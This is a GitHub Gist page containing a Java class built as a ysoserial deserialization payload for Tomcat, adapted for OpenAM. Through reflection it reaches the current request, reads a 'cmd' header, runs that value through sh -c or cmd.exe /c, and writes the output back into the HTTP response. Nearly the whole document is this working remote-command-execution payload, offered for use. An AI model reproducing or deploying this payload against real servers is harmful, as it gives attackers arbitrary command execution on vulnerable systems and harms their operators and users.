Created
July 14, 2021 09:03
-
-
Save testanull/de8424c4e23cd6ce811fe614fafbd6ec to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package ysoserial.payloads; | |
import com.sun.org.apache.xalan.internal.xsltc.DOM; | |
import com.sun.org.apache.xalan.internal.xsltc.TransletException; | |
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; | |
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; | |
import com.sun.org.apache.xml.internal.serializer.SerializationHandler; | |
import org.apache.catalina.connector.Response; | |
import org.apache.catalina.connector.ResponseFacade; | |
import org.apache.catalina.core.ApplicationFilterChain; | |
import javax.servlet.ServletRequest; | |
import javax.servlet.ServletResponse; | |
import javax.servlet.ServletResponseWrapper; | |
import javax.servlet.http.HttpServletRequest; | |
import java.io.InputStream; | |
import java.lang.reflect.Field; | |
import java.lang.reflect.Modifier; | |
import java.util.Scanner; | |
/** | |
* @author threedr3am | |
*/ | |
public class TomcatEchoInjectOpenAM extends AbstractTranslet { | |
static { | |
try { | |
Field WRAP_SAME_OBJECT_FIELD = Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT"); | |
Field lastServicedRequestField = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest"); | |
Field lastServicedResponseField = ApplicationFilterChain.class.getDeclaredField("lastServicedResponse"); | |
Field modifiersField = Field.class.getDeclaredField("modifiers"); | |
modifiersField.setAccessible(true); | |
modifiersField.setInt(WRAP_SAME_OBJECT_FIELD, WRAP_SAME_OBJECT_FIELD.getModifiers() & ~Modifier.FINAL); | |
modifiersField.setInt(lastServicedRequestField, lastServicedRequestField.getModifiers() & ~Modifier.FINAL); | |
modifiersField.setInt(lastServicedResponseField, lastServicedResponseField.getModifiers() & ~Modifier.FINAL); | |
WRAP_SAME_OBJECT_FIELD.setAccessible(true); | |
lastServicedRequestField.setAccessible(true); | |
lastServicedResponseField.setAccessible(true); | |
ThreadLocal<ServletResponse> lastServicedResponse = | |
(ThreadLocal<ServletResponse>) lastServicedResponseField.get(null); | |
ThreadLocal<ServletRequest> lastServicedRequest = (ThreadLocal<ServletRequest>) lastServicedRequestField.get(null); | |
boolean WRAP_SAME_OBJECT = WRAP_SAME_OBJECT_FIELD.getBoolean(null); | |
String cmd = lastServicedRequest != null ? ((HttpServletRequest)(lastServicedRequest.get())).getHeader("cmd") : null; | |
if (!WRAP_SAME_OBJECT || lastServicedResponse == null || lastServicedRequest == null) { | |
lastServicedRequestField.set(null, new ThreadLocal<>()); | |
lastServicedResponseField.set(null, new ThreadLocal<>()); | |
WRAP_SAME_OBJECT_FIELD.setBoolean(null, true); | |
} else if (cmd != null) { | |
ServletResponse responseFacade = lastServicedResponse.get(); | |
responseFacade.getWriter(); | |
java.io.Writer w = responseFacade.getWriter(); | |
//adjust for openAm | |
Field rsf = ServletResponseWrapper.class.getDeclaredField("response"); | |
rsf.setAccessible(true); | |
ResponseFacade responseFacade1 = (ResponseFacade) rsf.get(responseFacade); | |
Field responseField = ResponseFacade.class.getDeclaredField("response"); | |
responseField.setAccessible(true); | |
Response response = (Response) responseField.get(responseFacade1); | |
Field usingWriter = Response.class.getDeclaredField("usingWriter"); | |
usingWriter.setAccessible(true); | |
usingWriter.set((Object) response, Boolean.FALSE); | |
boolean isLinux = true; | |
String osTyp = System.getProperty("os.name"); | |
if (osTyp != null && osTyp.toLowerCase().contains("win")) { | |
isLinux = false; | |
} | |
String[] cmds = isLinux ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd}; | |
InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); | |
Scanner s = new Scanner(in).useDelimiter("\\a"); | |
String output = s.hasNext() ? s.next() : ""; | |
w.write(output); | |
w.flush(); | |
w.close(); | |
} | |
} catch (Exception e) { | |
e.printStackTrace(); | |
} | |
} | |
@Override | |
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { | |
} | |
@Override | |
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) | |
throws TransletException { | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment